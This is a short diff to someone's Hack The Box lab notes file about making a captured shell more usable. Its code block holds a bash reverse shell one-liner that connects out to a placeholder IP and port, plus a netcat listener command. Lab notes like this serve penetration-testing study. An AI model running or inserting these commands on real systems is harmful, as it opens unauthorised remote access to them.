ChaoticCyber/Notes/HTB/Qol.md

-Interesting observation where a user upgraded the usability of their shell
+Interesting observation where a user upgraded the usability of their shell.
+Allows for the ability to up arrow prev commands.

 ```
-`bash -c 'bash -i >& /dev/tcp/[IP]/80 0>&1'
+`bash -c 'bash -i >& /dev/tcp/[IP]/[Port] 0>&1'

 nc -nvlp 80